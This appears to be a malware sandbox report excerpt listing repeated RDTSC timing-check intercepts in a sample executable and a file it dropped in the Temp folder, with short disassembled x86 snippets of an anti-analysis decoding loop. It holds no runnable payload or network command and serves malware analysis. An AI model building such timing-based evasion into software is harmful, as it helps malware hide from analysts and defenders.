Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F00EF second address: 00000000004F00F5 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F00F5 second address: 00000000004F0116 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C680h 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0116 second address: 00000000004F011C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F011C second address: 00000000004F0142 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C686h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0142 second address: 00000000004F0148 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0148 second address: 00000000004F0167 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0167 second address: 00000000004F016D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F016D second address: 00000000004F0188 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Bh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0188 second address: 00000000004F018E instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F018E second address: 00000000004F01B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C686h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F01B3 second address: 00000000004F01B9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F01B9 second address: 00000000004F01DA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C681h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F01DA second address: 00000000004F01E0 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F01E0 second address: 00000000004F0203 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C683h 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0203 second address: 00000000004F0209 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0209 second address: 00000000004F0226 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0226 second address: 00000000004F022C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F022C second address: 00000000004EFF9F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Eh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F108C38C3C8h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFF9F second address: 00000000004EFFA5 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFFA5 second address: 00000000004EFFC3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFFC3 second address: 00000000004EFFC9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFFC9 second address: 00000000004EFFE5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFFE5 second address: 00000000004EFFEB instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFFEB second address: 00000000004F0007 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0007 second address: 00000000004F000D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F000D second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C684h 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0275 second address: 00000000004F027B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB01 second address: 00000000004EFB07 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB07 second address: 00000000004EFB20 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Ah 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB20 second address: 00000000004EFB26 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB26 second address: 00000000004EFB4B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE33h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 004EFE72h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB4B second address: 00000000004EFB51 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB51 second address: 00000000004EFB74 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE35h 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB74 second address: 00000000004EFB7A instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB7A second address: 00000000004EFB9B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB9B second address: 00000000004EFBA1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFBA1 second address: 00000000004EFBC1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 004F06A6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFBC1 second address: 00000000004EFBC7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFBC7 second address: 00000000004EFBEA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE31h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 004EFED6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFBEA second address: 00000000004EFBF0 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFBF0 second address: 00000000004EFEDD instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE32h 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFEDD second address: 00000000004EFEE3 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFEE3 second address: 00000000004EFF03 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE32h 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF03 second address: 00000000004EFF09 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF09 second address: 00000000004EFF31 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE34h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF31 second address: 00000000004EFF37 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF37 second address: 00000000004EFF56 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Bh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF56 second address: 00000000004EFF5C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF5C second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Ch 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F108C98FED9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F002E second address: 00000000004F0034 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0034 second address: 00000000004F0062 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE35h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F108C990039h 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0062 second address: 00000000004F0068 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0068 second address: 00000000004F0085 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0085 second address: 00000000004F008B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F008B second address: 00000000004F00A5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Bh 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F00A5 second address: 00000000004F00AB instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F00AB second address: 00000000004F00C7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Ch 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F00C7 second address: 00000000004F00CD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F00CD second address: 00000000004F00EF instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE32h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F00EF second address: 00000000004F00F5 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F00F5 second address: 00000000004F0116 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE30h 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0116 second address: 00000000004F011C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F011C second address: 00000000004F0142 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE36h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0142 second address: 00000000004F0148 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0148 second address: 00000000004F0167 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0167 second address: 00000000004F016D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F016D second address: 00000000004F0188 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Bh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0188 second address: 00000000004F018E instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F018E second address: 00000000004F01B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE36h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F01B3 second address: 00000000004F01B9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F01B9 second address: 00000000004F01DA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE31h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F01DA second address: 00000000004F01E0 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F01E0 second address: 00000000004F0203 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE33h 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0203 second address: 00000000004F0209 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0209 second address: 00000000004F0226 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0226 second address: 00000000004F022C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F022C second address: 00000000004EFF9F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Eh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F108C98FB78h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF9F second address: 00000000004EFFA5 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFFA5 second address: 00000000004EFFC3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFFC3 second address: 00000000004EFFC9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFFC9 second address: 00000000004EFFE5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFFE5 second address: 00000000004EFFEB instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFFEB second address: 00000000004F0007 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0007 second address: 00000000004F000D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
